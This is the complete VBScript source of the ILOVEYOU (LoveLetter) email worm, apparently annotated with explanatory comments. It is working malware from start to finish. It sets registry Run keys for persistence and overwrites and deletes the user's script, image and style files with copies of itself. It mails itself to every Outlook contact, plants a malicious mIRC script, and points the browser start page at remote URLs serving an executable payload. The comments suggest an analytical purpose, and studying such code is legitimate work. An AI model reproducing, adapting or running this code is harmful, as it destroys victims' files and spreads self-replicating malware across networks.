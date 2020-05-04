1

rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next rem Setup global variables to be used throughout subroutines and functions. Dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow eq = "" ctr = 0 rem Open the current script file and define "vbscopy" which can be used to rem read its own contents. Used to replicate itself in other files. Set fso = CreateObject("Scripting.FileSystemObject") Set file = fso.OpenTextFile(WScript.ScriptFullname, 1) vbscopy = file.ReadAll main() rem Subroutine to initalize the program Sub main() On Error Resume Next Dim wscr, rr Set wscr = CreateObject("WScript.Shell") rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") If (rr >= 1) Then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD" End If rem Finds special folders, such as system, temporary and windows folders. Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) rem Copy itself into VBScript files MSKernel32.vbs, Win32DLL.vbs and rem LOVE-LETTER-FOR-YOU.TXT.vbs c.Copy(dirsystem & "\MSKernel32.vbs") c.Copy(dirwin & "\Win32DLL.vbs") c.Copy(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() End Sub rem Subroutine to create/update registry values. Sub regruns() On Error Resume Next Dim num, downread rem Set the system to automatically run MSKernel32.vbs and Win32DLL.vbs on startup. regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", dirsystem & "\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL", dirwin & "\Win32DLL.vbs" rem Get internet Explorer's download directory. downread = "" downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") rem If the directory wasn't found, then use C:\ drive as the download directory. If (downread = "") Then downread = "c:\" End If rem Check if a file named "WinFAT32.exe" exists in the system files. If (fileexist(dirsystem & "\WinFAT32.exe") = 1) Then Randomize rem Generate a random number from 1 to 4. num = Int((4 * Rnd) + 1) rem Randomly update the Internet Explorer's start page that leads to a rem page that will download a malicious executable "WIN-BUGSFIX.exe". If num = 1 Then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" ElseIf num = 2 Then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" ElseIf num = 3 Then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" ElseIf num = 4 Then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" End If End If rem Check if the "WIN-BUGSFIX.exe" file exists in the download directory. If (fileexist(downread & "\WIN-BUGSFIX.exe") = 0) Then rem Add WIN-BUGSFIX.exe to run on startup regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", downread & "\WIN-BUGSFIX.exe" rem Update Internet Explorer's start page to "about:blank" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage", "about:blank" End If End Sub rem Subroutine to list folders in drives. Sub listadriv() On Error Resume Next Dim d, dc, s Set dc = fso.Drives For Each d In dc If (d.DriveType = 2) Or (d.DriveType = 3) Then folderlist(d.path & "\") End If Next listadriv = s End Sub rem Subroutine infect other files, by copying itself into them as well rem as creating a malicious mIRC script. Sub infectfiles(folderspec) On Error Resume Next Dim f, f1, fc, ext, ap, mircfname, s, bname, mp3 Set f = fso.GetFolder(folderspec) Set fc = f.Files For Each f1 In fc ext = fso.GetExtensionName(f1.path) ext = lcase(ext) s = lcase(f1.name) rem Copies itself into every file with vbs/vbe extension. If (ext = "vbs") Or (ext = "vbe") Then Set ap = fso.OpenTextFile(f1.path, 2, true) ap.write vbscopy ap.close rem Copies itself into every file with js/jse/css/wsh/sct/hta extension. ElseIf (ext = "js") Or (ext = "jse") Or (ext = "css") Or (ext = "wsh") Or (ext = "sct") Or (ext = "hta") Then Set ap = fso.OpenTextFile(f1.path, 2, true) ap.write vbscopy ap.close bname = fso.GetBaseName(f1.path) Set cop = fso.GetFile(f1.path) cop.copy(folderspec & "\" & bname & ".vbs") fso.DeleteFile(f1.path) rem Copies itself into every file with jpg/jpeg extension. ElseIf (ext = "jpg") Or (ext = "jpeg") Then rem Copies itself Set ap = fso.OpenTextFile(f1.path, 2, true) ap.write vbscopy ap.close Set cop = fso.GetFile(f1.path) cop.copy(f1.path & ".vbs") fso.DeleteFile(f1.path) rem Copies itself into every file with mp3/mp2 extension. ElseIf (ext = "mp3") Or (ext = "mp2") Then Set mp3 = fso.CreateTextFile(f1.path & ".vbs") mp3.write vbscopy mp3.close Set att = fso.GetFile(f1.path) att.attributes = att.attributes + 2 End If If (eq <> folderspec) Then rem Looks for mIRC and related files to determine whether it rem should create/replace its script.ini with a malicious script. If (s = "mirc32.exe") Or (s = "mlink32.exe") Or (s = "mirc.ini") Or (s = "script.ini") Or (s = "mirc.hlp") Then Set scriptini = fso.CreateTextFile(folderspec & "\script.ini") rem The following mIRC script checks if the "nick" of a user is the same rem as "me" to halt and send a DCC command to send a message to the user rem with a link to the LOVE=LETTER-FOR-YOU html page on the system. scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, If mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /If ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick" & dirsystem & "\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq = folderspec End If End If Next End Sub rem Subroutine used to get file listing of a folder. Sub folderlist(folderspec) On Error Resume Next Dim f, f1, sf Set f = fso.GetFolder(folderspec) Set sf = f.SubFolders For Each f1 In sf infectfiles(f1.path) folderlist(f1.path) Next End Sub rem Subroutine used to create/write registry entries. Sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey, regvalue End Sub rem Subroutine used to get registry entries. Function regget(value) Set regedit = CreateObject("WScript.Shell") regget = regedit.RegRead(value) End Function rem Function to check if a file exists. Function fileexist(filespec) On Error Resume Next Dim msg If (fso.FileExists(filespec)) Then msg = 0 Else msg = 1 End If fileexist = msg End Function rem Function to check if a folder exists. Function folderexist(folderspec) On Error Resume Next Dim msg If (fso.GetFolderExists(folderspec)) Then msg = 0 Else msg = 1 End If fileexist = msg End Function rem Subroutine to send emails to the user's contacts (MAPI) Sub spreadtoemail() On Error Resume Next Dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad Set regedit = CreateObject("WScript.Shell") Set out = WScript.CreateObject("Outlook.Application") Set mapi = out.GetNameSpace("MAPI") rem Goes through all contacts in the address book and sends an email rem with the LOVE-LETTER-FOR-YOU program as an attachment. For ctrlists = 1 To mapi.AddressLists.Count Set a = mapi.AddressLists(ctrlists) x = 1 regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a) If (regv = "") Then regv = 1 End If If (int(a.AddressEntries.Count) > int(regv)) Then For ctrentries = 1 To a.AddressEntries.Count malead = a.AddressEntries(x) regad = "" regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead ) If (regad = "") Then Set male = out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD" End If x = x + 1 Next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count Else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count End If Next Set out = Nothing Set mapi = Nothing End Sub rem Subroutine to generate and create the HTML file for LOVE-LETTER-FOR-YOU.HTM. Sub html On Error Resume Next Dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6 rem Generates an HTML page which contains JScript and VBScript replicate itself. rem by leveraging ActiveX. It also listens for mouse and key events, which rem ends up open more windows of the page. dta1 = "<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>" & vbcrlf & _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>" & vbcrlf & _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>" & vbcrlf & _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ " & vbcrlf & _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>" & vbcrlf & _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>" & vbcrlf & _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>" & vbcrlf & _ "<?-?BODY><?-?HTML>" & vbcrlf & _ "<SCRIPT language=@-@JScript@-@>" & vbcrlf & _ "<!--?-??-?" & vbcrlf & _ "If (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}" & vbcrlf & _ "?-??-?-->" & vbcrlf & _ "<?-?SCRIPT>" & vbcrlf & _ "<SCRIPT LANGUAGE=@-@VBScript@-@>" & vbcrlf & _ "<!--" & vbcrlf & _ "on error resume next" & vbcrlf & _ "Dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit" & vbcrlf & _ "aw=1" & vbcrlf & _ "code=" dta2 = "Set fso=CreateObject(@-@Scripting.FileSystemObject@-@)" & vbcrlf & _ "Set dirsystem=fso.GetSpecialFolder(1)" & vbcrlf & _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))" & vbcrlf & _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))" & vbcrlf & _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))" & vbcrlf & _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)" & vbcrlf & _ "wri.write code4" & vbcrlf & _ "wri.close" & vbcrlf & _ "If (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) Then" & vbcrlf & _ "If (err.number=424) Then" & vbcrlf & _ "aw=0" & vbcrlf & _ "End If" & vbcrlf & _ "If (aw=1) Then" & vbcrlf & _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@" & vbcrlf & _ "window.close" & vbcrlf & _ "End If" & vbcrlf & _ "End If" & vbcrlf & _ "Set regedit = CreateObject(@-@WScript.Shell@-@)" & vbcrlf & _ "regedit.RegWrite@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@" & vbcrlf & _ "?-??-?-->" & vbcrlf & _ "<?-?SCRIPT>" dt1 = replace(dta1, chr(35) & chr(45) & chr(35), "'") dt1 = replace(dt1, chr(64) & chr(45) & chr(64), """") dt4 = replace(dt1, chr(63) & chr(45) & chr(63), "/") dt5 = replace(dt4, chr(94) & chr(45) & chr(94), "\") dt2 = replace(dta2, chr(35) & chr(45) & chr(35), "'") dt2 = replace(dt2, chr(64) & chr(45) & chr(64), """") dt3 = replace(dt2, chr(63) & chr(45) & chr(63), "/") dt6 = replace(dt3, chr(94) & chr(45) & chr(94), "\") Set fso = CreateObject("Scripting.FileSystemObject") Set c = fso.OpenTextFile(WScript.ScriptFullName, 1) lines = Split(c.ReadAll,vbcrlf) l1 = ubound(lines) For n = 0 to ubound(lines) lines(n) = replace(lines(n), "'", chr(91) + chr(45) + chr(91)) lines(n) = replace(lines(n), """", chr(93) + chr(45) + chr(93)) lines(n) = replace(lines(n), "\", chr(37) + chr(45) + chr(37)) If (l1 = n) Then lines(n) = chr(34) + lines(n) + chr(34) Else lines(n) = chr(34) + lines(n) + chr(34) & " & vbcrlf & _" End If Next rem Create the LOVE-LETTER-FOR-YOU.HTM file in the system directory. Set b = fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM") b.close Set d = fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM", 2) d.write dt5 d.write join(lines, vbcrlf) d.write vbcrlf d.write dt6 d.close End Sub